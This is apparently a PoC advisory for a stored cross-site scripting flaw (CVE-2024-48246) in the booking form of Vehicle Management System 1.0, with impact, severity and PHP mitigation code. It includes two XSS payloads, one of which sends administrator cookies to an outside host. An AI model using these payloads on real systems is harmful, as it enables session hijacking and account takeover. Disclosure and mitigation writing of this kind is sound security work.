POC details: ef6054890fb4abed8e2f8e5e3983f31306e61e1f

Related vulnerability
Title: N/A (CVE-2024-48246)
Description: A stored cross-site scripting (XSS) vulnerability exists in the "Name" parameter of the /vehicle-management/booking.php page in Vehicle Management System 1.0.
Description
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)
Introduction
# CVE-2024-48246
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)

# Description

Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. An attacker can inject a payload into the Name field; the payload is stored and executed when an administrator views the booking list at /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.

# Affected Parameter

Name=

# Affected Endpoints

/vehicle-management/booking.php

/vehicle-management/bookinglist.php

# Vulnerability Details

Type: Cross-Site Scripting (XSS)

Vendor: Vehicle Management System

Affected Version: 1.0

# Attack Vectors

Guest User Attack:

A guest user inputs a payload into the Name parameter at /vehicle-management/booking.php.
The malicious payload gets stored and executed when an admin views /vehicle-management/bookinglist.php.
Example payload for session hijacking:

```
<img src=x onerror=this.src='http://oastify.com"+document.cookie>
```

# Alert Example

Another payload can trigger an alert or perform other malicious actions without requiring cookies:

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

Note: A SQL Injection error may occur during payload submission, but it will still get stored and executed.

# Impact

Exploiting this vulnerability allows attackers to:

Execute arbitrary JavaScript in the context of the administrator’s session.

Hijack administrator sessions via stolen cookies.

Perform unauthorized actions or escalate privileges.

# Mitigation

Sanitize and encode user input for all parameters, especially Name.

Implement a Content Security Policy (CSP) to limit script execution.

Update to a patched version if available.
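The following is an added example, not code from Vehicle Management System, showing the first two mitigations applied to a hypothetical booking-list page: a CSP header, a validation check for the Name field at submission time, and output encoding of every stored field when the list is rendered. The `$rows` sample data and the column names `id`, `name` and `vehicle` are assumptions.

```php
<?php
// Added example, not the project's own code. Column names and the $rows
// sample data are assumptions standing in for the real database result.
declare(strict_types=1);

// Mitigation 1: Content Security Policy. Inline scripts and event handlers
// such as onerror/ontoggle are blocked even if an encoding bug slips
// through. Adjust the source lists to the application's real asset origins.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");

// Mitigation 2a: server-side validation at booking.php. Rejecting malformed
// names early is defence in depth; output encoding is what prevents XSS.
function validName(string $name): bool
{
    $name = trim($name);
    return $name !== ''
        && mb_strlen($name, 'UTF-8') <= 100
        && preg_match('/^[\p{L}\p{M}\s.\'-]+$/u', $name) === 1;
}

// Mitigation 2b: encode a value for HTML element content or a double-quoted
// attribute. ENT_QUOTES covers ' and ", ENT_SUBSTITUTE avoids an empty result
// on invalid UTF-8, and the charset must match the page's declared charset.
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern (the defect described above): the stored value is
// written into the admin page unchanged.
//   echo "<td>" . $row['name'] . "</td>";

// Hardened rendering of bookinglist.php: every stored field is encoded at
// output time, regardless of what was accepted when the booking was saved.
$rows = [ // constructed sample rows
    ['id' => 1, 'name' => 'Alice',            'vehicle' => 'Sedan'],
    ['id' => 2, 'name' => '<b>Bob</b> & "Co"', 'vehicle' => 'Van'],
];

echo "<table>\n";
foreach ($rows as $row) {
    echo "<tr>"
       . "<td>" . h((string) $row['id']) . "</td>"
       . "<td>" . h($row['name']) . "</td>"      // renders as literal text, not markup
       . "<td>" . h($row['vehicle']) . "</td>"
       . "</tr>\n";
}
echo "</table>\n";
```

The second sample row is emitted as `&lt;b&gt;Bob&lt;/b&gt; &amp; &quot;Co&quot;`, so the browser displays it as text instead of parsing it as HTML.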

# Severity

High (CVSS: 8.2)

Attack Vector: Network

Privileges Required: Low

User Interaction: Partially Required (Admin views booking list)
File snapshot

```
[4.0K] /data/pocs/ef6054890fb4abed8e2f8e5e3983f31306e61e1f
├── [1.0K] LICENSE
└── [2.0K] README.md

0 directories, 2 files
```